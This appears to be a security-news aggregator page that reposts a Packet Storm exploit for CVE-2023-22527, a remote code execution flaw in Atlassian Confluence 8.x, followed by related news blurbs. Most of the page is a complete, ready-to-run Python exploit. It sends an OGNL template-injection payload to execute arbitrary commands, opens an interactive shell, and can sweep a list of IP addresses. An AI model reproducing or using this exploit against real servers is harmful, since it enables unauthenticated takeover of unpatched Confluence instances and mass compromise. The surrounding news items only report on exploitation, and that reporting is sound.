Security
Headlines
HeadlinesLatestCVEs

Headline

Atlassian Confluence 8.5.3 Remote Code Execution

Atlassian Confluence versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, and 8.5.0 through 8.5.3 suffer from a remote code execution vulnerability.

Packet Storm
#vulnerability#apache#rce#auth#ssl
# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability# Date: 25/1/2024# Exploit Author: MaanVader# Vendor Homepage: https://www.atlassian.com/software/confluence# Software Link: https://www.atlassian.com/software/confluence# Version:  8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3# Tested on: 8.5.3# CVE : CVE-2023-22527import requestsimport argparseimport urllib3from prompt_toolkit import PromptSessionfrom prompt_toolkit.formatted_text import HTMLfrom rich.console import Console# Disable SSL warningsurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# Argument parsingparser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")parser.add_argument("-u", "--url", help="Single Confluence Server URL")parser.add_argument("-f", "--file", help="File containing list of IP addresses")parser.add_argument("-c", "--command", help="Command to Execute")parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")args = parser.parse_args()# Rich console for formatted outputconsole = Console()# Function to send payloaddef send_payload(url, command):    headers = {        'Connection': 'close',        'Content-Type': 'application/x-www-form-urlencoded'    }    payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'                      '&[email protected]@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')    headers['Content-Length'] = str(len(payload))        full_url = f"{url}/template/aui/text-inline.vm"    response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)    return response.text.split('<!DOCTYPE html>')[0].strip()# Interactive shell functiondef interactive_shell(url):    session = PromptSession()    console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")    while True:        try:            cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))            if cmd.lower() in ["exit", "quit"]:                break            response = send_payload(url, cmd)            console.print(response)        except KeyboardInterrupt:            break        except Exception as e:            console.print(f"[bold red]Error: {e}[/bold red]")            break# Process file functiondef process_file(file_path):    with open(file_path, 'r') as file:        for line in file:            ip = line.strip()            url = f"http://{ip}:8090"            console.print(f"Processing {url}")            print(send_payload(url, args.command))# Main execution logicif args.shell and args.url:    interactive_shell(args.url)elif args.url and args.command:    print(send_payload(args.url, args.command))elif args.file and args.command:    process_file(args.file)else:    print("Error: Please provide a valid URL and a command or use the interactive shell option.")

Related news

Progress WhatsUp Gold Exploited Just Hours After PoC Release for Critical Flaw

Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks. The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who

Atlassian Confluence Vulnerability Exploited in Crypto Mining Campaigns

Threat actors are actively exploiting a now-patched, critical security flaw impacting the Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining on susceptible instances. "The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes,

November 2023 – January 2024: New Vulristics Features, 3 Months of Microsoft Patch Tuesdays and Linux Patch Wednesdays, Year 2023 in Review

Hello everyone! It has been 3 months since the last episode. I spent most of this time improving my Vulristics project. So in this episode, let’s take a look at what’s been done. Alternative video link (for Russia): https://vk.com/video-149273431_456239139 Also, let’s take a look at the Microsoft Patch Tuesdays vulnerabilities, Linux Patch Wednesdays vulnerabilities and […]

Atlassian Confluence SSTI Injection

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.

~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation

Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible

Citrix, VMware, and Atlassian Hit with Critical Flaws — Patch ASAP!

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild. The flaws are listed below - CVE-2023-6548 (CVSS score: 5.5) - Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution